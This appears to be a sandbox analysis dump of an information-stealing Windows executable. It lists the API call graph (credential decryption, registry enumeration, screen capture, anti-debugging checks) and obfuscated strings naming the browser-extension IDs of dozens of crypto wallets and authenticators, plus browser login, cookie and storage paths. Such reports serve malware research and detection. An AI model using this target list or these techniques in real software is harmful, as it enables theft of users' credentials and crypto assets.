14 API calls 72498->72501 72503 40b7bb 43 API calls 72498->72503 72595 41f9a4 72498->72595 72499->72498 72500->72498 72501->72498 72503->72498 72516 436af4 __fread_nolock CallUnexpected _strlen 72504->72516 72505 436adc 176 API calls 72505->72516 72506 434fac 15 API calls 72506->72516 72507 438e28 LoadLibraryW GetPEB lstrcmpiW 72507->72516 72508 438e28 3 API calls 72513 438a76 GetPhysicallyInstalledSystemMemory 72508->72513 72509 438019 72509->72433 72510 437265 KiUserCallbackDispatcher 72510->72516 72511 434040 46 API calls 72511->72516 72512 419e6b 127 API calls 72512->72516 72513->72516 72514 438b8c EnumDisplayDevicesA 72514->72516 72516->72505 72516->72506 72516->72507 72516->72508 72516->72509 72516->72510 72516->72511 72516->72512 72516->72514 72517 44568a 29 API calls 72516->72517 72518 41f9a4 58 API calls 72516->72518 72659 41d057 72516->72659 72665 44be84 43 API calls __wfreopen_s 72516->72665 72666 4360e1 72516->72666 72517->72516 72518->72516 72536 434090 CallUnexpected _wctomb_s _strlen 72521->72536 72522 434f14 RegCloseKey 72522->72536 72523 434be9 RegQueryValueExW 72523->72536 72524 4349e7 72524->72433 72525 434f73 RegCloseKey 72525->72536 72526 434d8e RegOpenKeyExW 72526->72536 72527 434ce5 wsprintfW 72527->72536 72528 4346ce wsprintfW 72528->72536 72529 434706 RegEnumKeyExW 72529->72536 72530 434758 RegCloseKey 72530->72536 72531 434954 RegOpenKeyExW 72531->72536 72533 419e6b 127 API calls 72533->72536 72534 434080 127 API calls 72534->72536 72535 447a80 14 API calls ___std_exception_copy 72535->72536 72536->72522 72536->72523 72536->72524 72536->72525 72536->72526 72536->72527 72536->72528 72536->72529 72536->72530 72536->72531 72536->72533 72536->72534 72536->72535 72671 419496 106 API calls 3 library calls 72536->72671 72545 433c23 72537->72545 72538 419e6b 127 API calls 72538->72545 72539 433d34 72541 4338b5 198 API calls 72541->72545 72543 434022 GetProcessHeap RtlFreeHeap 72543->72433 72544 43323b 198 API calls 72544->72545 72545->72538 72545->72539 72545->72541 72545->72543 72545->72544 72672 430e6c 72545->72672 72693 43350d 200 API calls 72545->72693 72694 432718 72545->72694 72548 421f01 72547->72548 72549 4220b5 GetPEB 72548->72549 72550 4279e0 GetPEB 72548->72550 72551 421f6c NtQueryInformationProcess 72548->72551 72552 42215d 72548->72552 72549->72548 72550->72548 72551->72548 72552->72433 72554 4224b4 72553->72554 72555 422795 GetPEB 72554->72555 72556 4227be NtQueryInformationProcess 72554->72556 72557 4279e0 GetPEB 72554->72557 72558 422802 72554->72558 72555->72554 72556->72554 72557->72554 72558->72433 72567 42cfd0 72559->72567 72560 42d5bb 72560->72433 72561 42b9ae 206 API calls 72561->72567 72563 42cfba 223 API calls 72563->72567 72564 42b9c5 223 API calls 72564->72567 72565 42c0da 223 API calls 72565->72567 72567->72560 72567->72561 72567->72563 72567->72564 72567->72565 72568 41a28f 182 API calls 72567->72568 72569 419b9d 72 API calls 72567->72569 72743 42ca0d 72567->72743 72758 42ad82 72567->72758 72568->72567 72569->72567 72584 4262bc __fread_nolock 72570->72584 72571 426972 72583 422177 55 API calls 72571->72583 72571->72584 72812 424c44 GetModuleFileNameW CreateFileW CloseHandle 72571->72812 72572 426847 RtlAdjustPrivilege 72573 4279e0 GetPEB 72572->72573 72573->72584 72575 4279e0 GetPEB 72575->72584 72576 426600 GetPEB 72576->72584 72577 4263c1 LoadLibraryA 72577->72584 72579 4269dc 72579->72433 72582 422817 17 API calls 72582->72584 72583->72571 72584->72571 72584->72572 72584->72575 72584->72576 72584->72577 72584->72579 72584->72582 72585 41f9a4 55 API calls 72584->72585 72586 4244e4 3 API calls 72584->72586 72809 41eb3f RaiseException 72584->72809 72810 424995 20 API calls ___std_exception_copy 72584->72810 72811 426a42 GetPEB GetPEB 72584->72811 72585->72584 72586->72584 72587->72459 72593 401c31 72588->72593 72589 401ebc GetSystemTimeAsFileTime 72589->72593 72590 401ff9 7 API calls 72590->72593 72591 401f62 __aulldiv 72591->72476 72592 401c1e 7 API calls 72592->72593 72593->72589 72593->72590 72593->72591 72593->72592 72594 402fcc 7 API calls 72593->72594 72594->72593 72629 41f9bc 72595->72629 72596 421bb3 NtQuerySystemInformation 72596->72629 72597 421bff NtQuerySystemInformation 72597->72629 72598 42162a GetProcessId 72598->72629 72599 420e2d NtClose 72599->72629 72600 4228cf 51 API calls 72600->72629 72602 424b24 GetPEB HeapDestroy 72602->72629 72603 4245ec 51 API calls 72603->72629 72606 447e24 ___std_exception_copy 15 API calls 72606->72629 72607 41f916 GetPEB VirtualQuery 72607->72629 72608 420a7a GetPEB 72608->72629 72609 421ee3 72609->72498 72611 4202ad GetCurrentProcessId 72611->72629 72612 447a80 ___std_exception_copy 14 API calls 72612->72629 72613 420593 NtDuplicateObject 72613->72629 72614 4224a3 GetPEB NtQueryInformationProcess GetPEB 72614->72629 72615 4262a1 51 API calls 72615->72629 72616 421eeb NtQueryInformationProcess GetPEB GetPEB 72616->72629 72617 422817 17 API calls 72617->72629 72619 422177 51 API calls 72619->72629 72621 41f536 51 API calls 72621->72629 72622 420bb6 72622->72629 72647 424c44 GetModuleFileNameW CreateFileW CloseHandle 72622->72647 72648 424bed GetPEB GetModuleFileNameW CreateFileW CloseHandle 72622->72648 72649 4228cf 72622->72649 72623 426a42 GetPEB GetPEB 72623->72629 72624 4279e0 GetPEB 72624->72629 72626 4269e4 GetPEB GetPEB 72626->72629 72628 41f9a4 51 API calls 72628->72629 72629->72596 72629->72597 72629->72598 72629->72599 72629->72600 72629->72602 72629->72603 72629->72606 72629->72607 72629->72608 72629->72609 72629->72611 72629->72612 72629->72613 72629->72614 72629->72615 72629->72616 72629->72617 72629->72619 72629->72621 72629->72622 72629->72623 72629->72624 72629->72626 72629->72628 72630 4244e4 3 API calls 72629->72630 72631 424995 20 API calls 72629->72631 72632 44814e 72629->72632 72645 424c8d 58 API calls ___std_exception_copy 72629->72645 72646 41eb3f RaiseException 72629->72646 72654 41ebeb 58 API calls 72629->72654 72655 41e6f0 58 API calls 72629->72655 72630->72629 72631->72629 72633 45699f 72632->72633 72634 4569b7 72633->72634 72635 4569ac 72633->72635 72637 4569bf 72634->72637 72643 4569c8 __dosmaperr 72634->72643 72636 44eb6f __fread_nolock 15 API calls 72635->72636 72642 4569b4 72636->72642 72638 44e224 __freea 14 API calls 72637->72638 72638->72642 72639 4569f2 RtlReAllocateHeap 72639->72642 72639->72643 72640 4569cd 72656 4447a4 14 API calls __dosmaperr 72640->72656 72642->72629 72643->72639 72643->72640 72657 44e560 EnterCriticalSection LeaveCriticalSection __dosmaperr 72643->72657 72645->72629 72646->72629 72647->72622 72648->72622 72650 422958 72649->72650 72658 424995 20 API calls ___std_exception_copy 72650->72658 72652 4244a9 72653 4262a1 58 API calls 72652->72653 72653->72652 72654->72629 72655->72629 72656->72642 72657->72643 72658->72652 72660 447e24 ___std_exception_copy 15 API calls 72659->72660 72661 41d065 72660->72661 72662 438e28 3 API calls 72661->72662 72663 41d079 GetCurrentHwProfileA 72662->72663 72664 41d083 72663->72664 72664->72516 72665->72516 72669 436133 72666->72669 72667 43669e 72667->72516 72668 447e24 ___std_exception_copy 15 API calls 72668->72669 72669->72667 72669->72668 72670 4360e1 15 API calls 72669->72670 72670->72669 72671->72536 72691 430e85 72672->72691 72673 4321e3 GetDIBits ReleaseDC 72673->72691 72674 431e4c GetObjectW 72674->72691 72675 432718 186 API calls 72675->72691 72676 4325bf GetProcessHeap 72676->72691 72677 432097 GetProcessHeap 72677->72691 72678 431d2b RtlAllocateHeap 72678->72691 72679 4326e0 GetProcessHeap RtlFreeHeap GetProcessHeap HeapFree 72679->72545 72680 431902 72681 430f3a RtlAllocateHeap 72681->72691 72682 4228cf 58 API calls 72682->72691 72683 431c69 GetDC 72683->72691 72684 4314b2 GetProcessHeap 72684->72691 72685 4314e4 HeapAlloc 72685->72691 72686 430e6c 186 API calls 72686->72691 72687 4338b5 186 API calls 72687->72691 72688 43350d 186 API calls 72688->72691 72689 43323b 186 API calls 72689->72691 72690 432b1b 186 API calls 72690->72691 72691->72673 72691->72674 72691->72675 72691->72676 72691->72677 72691->72678 72691->72679 72691->72680 72691->72681 72691->72682 72691->72683 72691->72684 72691->72685 72691->72686 72691->72687 72691->72688 72691->72689 72691->72690 72692 433c10 186 API calls 72691->72692 72692->72691 72693->72545 72706 43272e 72694->72706 72695 432a76 CreateCompatibleBitmap 72695->72706 72696 432a26 BitBlt 72696->72706 72697 432a5b SelectObject 72697->72706 72698 432a0e SelectObject 72698->72706 72699 432893 CreateCompatibleDC 72699->72706 72700 432943 72701 432afb DeleteDC DeleteObject 72701->72545 72702 430e6c 193 API calls 72702->72706 72704 4338b5 193 API calls 72704->72706 72706->72695 72706->72696 72706->72697 72706->72698 72706->72699 72706->72700 72706->72701 72706->72702 72706->72704 72707 432718 193 API calls 72706->72707 72708 432b1b 72706->72708 72720 43350d 200 API calls 72706->72720 72707->72706 72712 432b24 72708->72712 72709 432fe8 72709->72706 72710 43302c GetDesktopWindow GetDC 72710->72712 72711 43350d 197 API calls 72711->72712 72712->72709 72712->72710 72712->72711 72713 432eb3 SystemParametersInfoW 72712->72713 72714 433c10 197 API calls 72712->72714 72715 432b1b 197 API calls 72712->72715 72716 4338b5 197 API calls 72712->72716 72717 432718 197 API calls 72712->72717 72718 430e6c 197 API calls 72712->72718 72721 43323b 72712->72721 72713->72712 72714->72712 72715->72712 72716->72712 72717->72712 72718->72712 72720->72706 72729 433253 72721->72729 72722 43341c GetSystemMetrics 72722->72729 72723 433448 72724 4334f3 DeleteDC 72724->72712 72725 4333c1 GetSystemMetrics 72725->72729 72726 43327e CreateDCW 72726->72729 72727 432718 196 API calls 72727->72729 72728 43350d 196 API calls 72728->72729 72729->72722 72729->72723 72729->72724 72729->72725 72729->72726 72729->72727 72729->72728 72731 4338b5 72729->72731 72738 4338cd 72731->72738 72732 4339bb 72733 433c10 199 API calls 72733->72738 72734 432b1b 199 API calls 72734->72738 72735 43323b 199 API calls 72735->72738 72736 432718 199 API calls 72736->72738 72737 4338b5 199 API calls 72737->72738 72738->72732 72738->72733 72738->72734 72738->72735 72738->72736 72738->72737 72739 433be8 72738->72739 72740 430e6c 199 API calls 72738->72740 72741 430e6c 199 API calls 72739->72741 72740->72738 72742 433bfc DeleteObject 72741->72742 72742->72729 72751 42ca20 72743->72751 72744 42ca0d 223 API calls 72744->72751 72745 42ad82 223 API calls 72745->72751 72746 42cb4e 72748 42cfa7 72753 447a80 ___std_exception_copy 14 API calls 72748->72753 72749 447e24 ___std_exception_copy 15 API calls 72749->72751 72750 40e14e 161 API calls 72750->72751 72751->72744 72751->72745 72751->72746 72751->72748 72751->72749 72751->72750 72752 42cfba 223 API calls 72751->72752 72754 438e28 3 API calls 72751->72754 72755 40b7bb 43 API calls 72751->72755 72775 42b9ae 72751->72775 72778 42b9c5 72751->72778 72752->72751 72757 42cfb2 72753->72757 72754->72751 72755->72751 72757->72567 72774 42ad95 72758->72774 72759 447e24 15 API calls ___std_exception_copy 72759->72774 72760 438e28 LoadLibraryW GetPEB lstrcmpiW 72760->72774 72761 42b9c5 223 API calls 72761->72774 72762 42b7f1 72763 42b99e 72768 447a80 ___std_exception_copy 14 API calls 72763->72768 72764 447a80 ___std_exception_copy 14 API calls 72764->72774 72766 42b9ae 206 API calls 72766->72774 72767 42ad82 223 API calls 72767->72774 72770 42b9a6 72768->72770 72769 42cfba 223 API calls 72769->72774 72770->72567 72771 40e14e 161 API calls 72771->72774 72772 40b7bb 43 API calls 72772->72774 72773 42ca0d 223 API calls 72773->72774 72774->72759 72774->72760 72774->72761 72774->72762 72774->72763 72774->72764 72774->72766 72774->72767 72774->72769 72774->72771 72774->72772 72774->72773 72792 42c0da 72774->72792 72776 430228 206 API calls 72775->72776 72777 42b9c1 72776->72777 72777->72751 72791 42b9d5 72778->72791 72779 42c04f 72780 42ad82 223 API calls 72780->72791 72781 438e28 3 API calls 72781->72791 72782 42c0ca 72787 447a80 ___std_exception_copy 14 API calls 72782->72787 72783 42b9c5 223 API calls 72783->72791 72784 42b9ae 206 API calls 72784->72791 72785 42ca0d 223 API calls 72785->72791 72786 447e24 ___std_exception_copy 15 API calls 72786->72791 72788 42c0d2 72787->72788 72788->72751 72789 40b7bb 43 API calls 72789->72791 72790 40e14e 161 API calls 72790->72791 72791->72779 72791->72780 72791->72781 72791->72782 72791->72783 72791->72784 72791->72785 72791->72786 72791->72789 72791->72790 72808 42c0ed 72792->72808 72793 42c878 72794 42ad82 223 API calls 72794->72808 72795 40b7bb 43 API calls 72795->72808 72796 42c9fd 72802 447a80 ___std_exception_copy 14 API calls 72796->72802 72797 42c0da 223 API calls 72797->72808 72798 447a80 14 API calls ___std_exception_copy 72798->72808 72799 42cfba 223 API calls 72799->72808 72800 42b9ae 206 API calls 72800->72808 72801 447e24 15 API calls ___std_exception_copy 72801->72808 72804 42ca05 72802->72804 72803 438e28 3 API calls 72803->72808 72804->72774 72805 42b9c5 223 API calls 72805->72808 72806 40e14e 161 API calls 72806->72808 72807 42ca0d 223 API calls 72807->72808 72808->72793 72808->72794 72808->72795 72808->72796 72808->72797 72808->72798 72808->72799 72808->72800 72808->72801 72808->72803 72808->72805 72808->72806 72808->72807 72809->72584 72810->72584 72812->72571 72813->72445 72814->72445 72816 443a37 72815->72816 72817 443a49 72815->72817 72842 4438d3 GetModuleHandleW 72816->72842 72827 443b8c 72817->72827 72820 443a3c 72820->72817 72843 443916 GetModuleHandleExW 72820->72843 72822 43ca83 72822->72402 72825 443a9b 72828 443b98 ___scrt_is_nonwritable_in_current_image 72827->72828 72849 44d13d EnterCriticalSection 72828->72849 72830 443ba2 72850 443aa1 72830->72850 72832 443baf 72854 443bcd 72832->72854 72835 4439ba 72859 443998 72835->72859 72838 4439d8 72840 443916 CallUnexpected 3 API calls 72838->72840 72839 4439c8 GetCurrentProcess TerminateProcess 72839->72838 72841 4439e0 ExitProcess 72840->72841 72842->72820 72844 443955 GetProcAddress 72843->72844 72845 443976 72843->72845 72844->72845 72848 443969 72844->72848 72846 443985 72845->72846 72847 44397c FreeLibrary 72845->72847 72846->72817 72847->72846 72848->72845 72849->72830 72851 443aad ___scrt_is_nonwritable_in_current_image 72850->72851 72853 443b14 CallUnexpected 72851->72853 72857 44446f 14 API calls 2 library calls 72851->72857 72853->72832 72858 44d154 LeaveCriticalSection 72854->72858 72856 443a80 72856->72822 72856->72835 72857->72853 72858->72856 72864 44fb15 GetPEB 72859->72864 72862 4439b4 72862->72838 72862->72839 72863 4439a2 GetPEB 72863->72862 72865 44399d 72864->72865 72866 44fb2f 72864->72866 72865->72862 72865->72863 72868 44ced5 72866->72868 72871 44cfe0 72868->72871 72872 44d00e 72871->72872 72877 44cef1 72871->72877 72872->72877 72878 44cf15 72872->72878 72875 44d028 GetProcAddress 72876 44d038 __dosmaperr 72875->72876 72875->72877 72876->72877 72877->72865 72883 44cf26 ___vcrt_FlsFree 72878->72883 72879 44cfbc 72879->72875 72879->72877 72880 44cf44 LoadLibraryExW 72881 44cfc3 72880->72881 72882 44cf5f GetLastError 72880->72882 72881->72879 72884 44cfd5 FreeLibrary 72881->72884 72882->72883 72883->72879 72883->72880 72885 44cf92 LoadLibraryExW 72883->72885 72884->72879 72885->72881 72885->72883 72886 450330 72891 45033d __dosmaperr 72886->72891 72887 45037d 72894 4447a4 14 API calls __dosmaperr 72887->72894 72888 450368 RtlAllocateHeap 72890 45037b 72888->72890 72888->72891 72891->72887 72891->72888 72893 44e560 EnterCriticalSection LeaveCriticalSection __dosmaperr 72891->72893 72893->72891 72894->72890 72895 426b04 72896 426b49 __fread_nolock 72895->72896 72897 426f39 72896->72897 72898 447e24 ___std_exception_copy 15 API calls 72896->72898 72899 447a80 ___std_exception_copy 14 API calls 72897->72899 72898->72896 72900 426f52 72899->72900 72901 4052d9 72902 4052ee __fread_nolock 72901->72902 72903 405900 72902->72903 72905 447e24 15 API calls ___std_exception_copy 72902->72905 72906 438e28 3 API calls 72902->72906 72908 438e28 3 API calls 72902->72908 72909 40b129 43 API calls 72902->72909 72913 447a80 ___std_exception_copy 14 API calls 72902->72913 72914 4035d1 45 API calls 72902->72914 72915 405aaa 72902->72915 72934 434fac 72902->72934 72905->72902 72906->72902 72910 405567 CryptUnprotectData 72908->72910 72909->72902 72911 447a80 ___std_exception_copy 14 API calls 72910->72911 72911->72902 72913->72902 72914->72902 72930 405ac3 CallUnexpected 72915->72930 72916 406018 lstrcatW 72916->72930 72917 405ebc lstrcatW 72922 4360e1 15 API calls 72917->72922 72918 405be7 lstrcatW 72918->72930 72920 4060e6 72920->72920 72921 405eed lstrcatW 72926 4360e1 15 API calls 72921->72926 72925 405ed0 lstrcatW lstrcatW 72922->72925 72923 405bb6 72929 4360e1 15 API calls 72923->72929 72924 403600 101 API calls 72924->72930 72925->72930 72927 405eff lstrcatW lstrcatW 72926->72927 72927->72930 72931 4061ef 72929->72931 72930->72916 72930->72917 72930->72918 72930->72920 72930->72921 72930->72923 72930->72924 72940 4048e2 46 API calls 72930->72940 72941 404988 46 API calls 72930->72941 72932 40e14e 161 API calls 72931->72932 72933 406203 72932->72933 72933->72902 72939 434fc2 _strcat _strncpy _strlen 72934->72939 72935 435e8e 72935->72902 72936 447e24 ___std_exception_copy 15 API calls 72936->72939 72937 4360e1 15 API calls 72937->72939 72938 434fac 15 API calls 72938->72939 72939->72935 72939->72936 72939->72937 72939->72938 72940->72930 72941->72930 72942 8ad3b6 72943 8ad3c5 72942->72943 72946 8adb56 72943->72946 72951 8adb71 72946->72951 72947 8adb7a CreateToolhelp32Snapshot 72948 8adb96 Module32First 72947->72948 72947->72951 72949 8adba5 72948->72949 72952 8ad3ce 72948->72952 72953 8ad815 72949->72953 72951->72947 72951->72948 72954 8ad840 72953->72954 72955 8ad889 72954->72955 72956 8ad851 VirtualAlloc 72954->72956 72955->72955 72956->72955 72957 233003c 72958 2330049 72957->72958 72972 2330e0f SetErrorMode SetErrorMode 72958->72972 72963 2330265 72964 23302ce VirtualProtect 72963->72964 72966 233030b 72964->72966 72965 2330439 VirtualFree 72970 23305f4 LoadLibraryA 72965->72970 72971 23304be 72965->72971 72966->72965 72967 23304e3 LoadLibraryA 72967->72971 72969 23308c7 72970->72969 72971->72967 72971->72970 72973 2330223 72972->72973 72974 2330d90 72973->72974 72975 2330dad 72974->72975 72976 2330dbb GetPEB 72975->72976 72977 2330238 VirtualAlloc 72975->72977 72976->72977 72977->72963 72978 4102de 72979 44814e 16 API calls 72978->72979 72980 4102f1 72979->72980
                                                                    APIs
                                                                    • lstrcatW.KERNEL32(?,?), ref: 00406AFC
                                                                    • lstrcatW.KERNEL32(?,\Local Storage\leveldb), ref: 00406B06
                                                                    • lstrcatW.KERNEL32(?,?,?), ref: 00408A66
                                                                    • lstrcatW.KERNEL32(?,/BrowserDB), ref: 00408A70
                                                                    Strings
                                                                    • hnfanknocfe576xedofbddgcijnm576xedhnfnkdnaad, xrefs: 0040840A
                                                                    • ICO576xedNex, xrefs: 004075D4
                                                                    • GAu576xedth Authe576xednticator, xrefs: 00407298
                                                                    • nkbihfbeo576xedgaeaoehlef576xednkodbefgpgknn, xrefs: 004087E8
                                                                    • kn576xedcchdigobgh576xedenbbaddojjnnaogfppfj, xrefs: 0040887E
                                                                    • bfn576xedaelmomeim576xedhlpmgjnjophhpkkoljpa, xrefs: 00408242
                                                                    • Tro576xednLi576xednk, xrefs: 00407616
                                                                    • onof576xedpnbbkehpmmoa576xedbgpcpmigafmmnjhl, xrefs: 004080AE
                                                                    • Bit576xedApp, xrefs: 00408847
                                                                    • Au576xedro, xrefs: 00407584
                                                                    • cnma576xedmaachppnkjgnil576xeddpdmkaakejnhae, xrefs: 00407593
                                                                    • fihka576xedkfobkmkjojpchpf576xedgcmhfjnmnfpi, xrefs: 00408856
                                                                    • EnK576xedrypt, xrefs: 00408897
                                                                    • Coinb576xedase, xrefs: 004083FB
                                                                    • Uni576xedSat, xrefs: 004082D2
                                                                    • nlgbh576xeddfgdhgbiamfdfmb576xedikcdghidoadd, xrefs: 00407D4F
                                                                    • EeS, xrefs: 00407043
                                                                    • Hy576xedcon Lite Cli576xedent, xrefs: 004080C7
                                                                    • Ni576xedfty, xrefs: 0040816B
                                                                    • Cl576xedover, xrefs: 004087AC
                                                                    • Hist576xedory, xrefs: 0040867F
                                                                    • bln576xedieiiffboi576xedllknjnepogjhkgnoapac, xrefs: 00408804
                                                                    • Ron576xedin Wall576xedet, xrefs: 004085CE
                                                                    • mnfif576xedefkajgofkcjkemidiae576xedcocnkjeh, xrefs: 00407F93
                                                                    • ejbalbako576xedplchlghecda576xedlmeeeajnimhm, xrefs: 00406E55
                                                                    • Coi576xedn98, xrefs: 00407492
                                                                    • Sa576xedturn, xrefs: 00407C8A
                                                                    • UL6T, xrefs: 0040702D
                                                                    • aea576xedchknmefphepccio576xednboohckonoeemg, xrefs: 004074A1
                                                                    • ffn576xedbelfdoeiohenk576xedjibnmadjiehjhajb, xrefs: 00408152
                                                                    • E576xedOS Authenti576xedcator, xrefs: 00406D19
                                                                    • cphhlg576xedmgameodnhkjdmkpa576xednlelnlohao, xrefs: 00407CC1
                                                                    • jojhf576xedeoedkpkglbfimdfabp576xeddfjaoolaf, xrefs: 004075BB
                                                                    • /BrowserDB, xrefs: 00408A68
                                                                    • Zi576xedlPay, xrefs: 0040746A
                                                                    • Na576xedsh Ex576xedtension, xrefs: 0040809F
                                                                    • Nab576xedox, xrefs: 00408018
                                                                    • iW576xedlt, xrefs: 0040886F
                                                                    • bcopg576xedchhojmggmff576xedilplmbdicgaihlkp, xrefs: 004080DA
                                                                    • cihm576xedoadaighcej576xedopammfbmddcmdekcje, xrefs: 004086BB
                                                                    • Ste576xedem Key576xedchain, xrefs: 0040827B
                                                                    • EQ576xedUAL, xrefs: 004076A5
                                                                    • Aut576xedhenti576xedcator, xrefs: 004074BA
                                                                    • fnjhmkhhmkb576xedjkkabndcn576xednogagogbneec, xrefs: 004085DD
                                                                    • bhgho576xedamapcdpbohphigoo576xedoaddinpkbai, xrefs: 004074C9
                                                                    • One576xedKey, xrefs: 00407859
                                                                    • imloif576xedkgjagghnncjkhgg576xeddhalmcnfklk, xrefs: 00408216
                                                                    • Te576xedzBox, xrefs: 00407F84
                                                                    • Liqu576xedality, xrefs: 00407EDD
                                                                    • lkcjl576xednjfpbikmcm576xedbachjpdbijejflpcm, xrefs: 00408084
                                                                    • kln576xedaejjgbibmhlephnh576xedpmaofohgkpgkd, xrefs: 00407479
                                                                    • Netw576xedork\Cook576xedies, xrefs: 00408505
                                                                    • nhnk576xedbkgjikgcigadomkph576xedalanndcapjk, xrefs: 004087BC
                                                                    • ookjlb576xedkiijinhpmnjffcofj576xedonbfbgaoc, xrefs: 00407F69
                                                                    • flpici576xedilemghbmfalica576xedjoolhkkenfel, xrefs: 004075E4
                                                                    • Wom576xedbat, xrefs: 004077AD
                                                                    • nkd576xeddgncdjgjfcddamfg576xedcmfnlhccnimig, xrefs: 00407C99
                                                                    • aiifb576xednbfobpmeekiphe576xedeijimdpnlpgpp, xrefs: 0040725B
                                                                    • Tr576xedezor Passw576xedord Manager, xrefs: 00408207
                                                                    • gae576xeddmjdfmmahhbj576xedefcbgaolhhanlaolb, xrefs: 00406D00
                                                                    • afbc576xedbjpbpfadlkmhm576xedclhkeeodmamcflc, xrefs: 004083E2
                                                                    • Au576xedthy, xrefs: 00406CF1
                                                                    • lodccj576xedjbdhfakaekdiahmedf576xedbieldgik, xrefs: 00407FBB
                                                                    • Te576xedmple, xrefs: 00408068
                                                                    • His576xedtory, xrefs: 004083AF
                                                                    • Yo576xedroi, xrefs: 00408143
                                                                    • Pha576xedntom, xrefs: 0040822F
                                                                    • W576xedeb Da576xedta, xrefs: 00408697
                                                                    • hcflp576xedincpppdclinealmandi576xedjcmnkbgn, xrefs: 0040804F
                                                                    • ijmp576xedgkjfkbfho576xedebgogflfebnmejmfbml, xrefs: 00407FE3
                                                                    • ibnejdfjmmk576xedpcnlpebklmnk576xedoeoihofec, xrefs: 00407625
                                                                    • amkmj576xedjmmflddogmhpjloim576xedipbofnfjih, xrefs: 004073C2
                                                                    • Bi576xedtClip, xrefs: 00407FD4
                                                                    • ME576xedW CX, xrefs: 004073DD
                                                                    • Le576xedaf, xrefs: 00407881
                                                                    • nanj576xedmdknhkinifnkgdcggcfnhd576xedaammmj, xrefs: 00407D13
                                                                    • fhmfend576xedgdocmcbmfikdcog576xedofphimnkno, xrefs: 00408903
                                                                    • dmkam576xedcknogkgcdfhhbddcghach576xedkejeap, xrefs: 004084B0
                                                                    • NeoL576xedine, xrefs: 00407CB2
                                                                    • Bin576xedance Cha576xedin Wal576xedlet, xrefs: 004085F6
                                                                    • nknhi576xedehlklippafakaeklbegl576xedecifhad, xrefs: 00408027
                                                                    • Ma576xedth, xrefs: 004083D3
                                                                    • Sol576xedlet, xrefs: 004088F4
                                                                    • Pol576xedymesh, xrefs: 004075AC
                                                                    • kkpllko576xeddjeloidieedojogacfhp576xedaihoh, xrefs: 004088A7
                                                                    • VL6T, xrefs: 0040891C
                                                                    • kpfop576xedkelmapcoipemfend576xedmdcghnegimn, xrefs: 00407EED
                                                                    • infe576xedboajgfhgbjpjbeppbkg576xednabfdkdaf, xrefs: 00407868
                                                                    • ppbibelpc576xedjmhbdihakflkd576xedcoccbgbkpo, xrefs: 004082E5
                                                                    • fhbohimaelboh576xedpjbbldcngcnapn576xeddodjp, xrefs: 00408128
                                                                    • Te576xedrra Stat576xedion, xrefs: 0040724B
                                                                    • Me576xedtaMa576xedsk, xrefs: 00406E46, 004087D8
                                                                    • nlbm576xednnijcnlegkjjpcfjclm576xedcfggfefdm, xrefs: 004081D0
                                                                    • dkded576xedlpgdmmkkfjabffeg576xedanieamfklkm, xrefs: 00407AF8
                                                                    • Cy576xedano, xrefs: 00407AE5
                                                                    • Gua576xedrda, xrefs: 00408423
                                                                    • hpg576xedlfhgfnhbgpjden576xedjgmdgoeiappafln, xrefs: 0040768A
                                                                    • EeS, xrefs: 00406B7F
                                                                    • Log576xedin Da576xedta Fo576xedr Acc576xedount, xrefs: 00408667
                                                                    • Lo576xedgin Da576xedta, xrefs: 0040864F
                                                                    • KH576xedC, xrefs: 00408040
                                                                    • By576xedone, xrefs: 004076ED
                                                                    • VL6T, xrefs: 004076C1
                                                                    • Ke576xedplr, xrefs: 004084A0
                                                                    • oel576xedjdldpnmdbchonieli576xeddgobddffflal, xrefs: 00406D28
                                                                    • DAp576xedpPlay, xrefs: 00407FAC
                                                                    • \Local Storage\leveldb, xrefs: 00406AFE
                                                                    • ilgcn576xedhelpchnceeipipij576xedaljkblbcobl, xrefs: 004072A7
                                                                    • cj576xedelfplplebdjjenllpjcbl576xedmjkfcffne, xrefs: 0040882E
                                                                    • jbd576xedaocneiiinmjbj576xedlgalhcelgbejmnid, xrefs: 00407D6E
                                                                    • Gu576xedild, xrefs: 004081EB
                                                                    • Ja576xedxx Lib576xederty, xrefs: 0040881F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat
                                                                    • String ID: /BrowserDB$Au576xedro$Au576xedthy$Aut576xedhenti576xedcator$Bi576xedtClip$Bin576xedance Cha576xedin Wal576xedlet$Bit576xedApp$By576xedone$Cl576xedover$Coi576xedn98$Coinb576xedase$Cy576xedano$DAp576xedpPlay$E576xedOS Authenti576xedcator$EQ576xedUAL$EnK576xedrypt$EeS$EeS$GAu576xedth Authe576xednticator$Gu576xedild$Gua576xedrda$His576xedtory$Hist576xedory$Hy576xedcon Lite Cli576xedent$ICO576xedNex$Ja576xedxx Lib576xederty$KH576xedC$Ke576xedplr$Le576xedaf$Liqu576xedality$Lo576xedgin Da576xedta$Log576xedin Da576xedta Fo576xedr Acc576xedount$ME576xedW CX$Ma576xedth$Me576xedtaMa576xedsk$Na576xedsh Ex576xedtension$Nab576xedox$NeoL576xedine$Netw576xedork\Cook576xedies$Ni576xedfty$One576xedKey$Pha576xedntom$Pol576xedymesh$Ron576xedin Wall576xedet$Sa576xedturn$Sol576xedlet$Ste576xedem Key576xedchain$Te576xedmple$Te576xedrra Stat576xedion$Te576xedzBox$Tr576xedezor Passw576xedord Manager$Tro576xednLi576xednk$UL6T$Uni576xedSat$VL6T$VL6T$W576xedeb Da576xedta$Wom576xedbat$Yo576xedroi$Zi576xedlPay$\Local 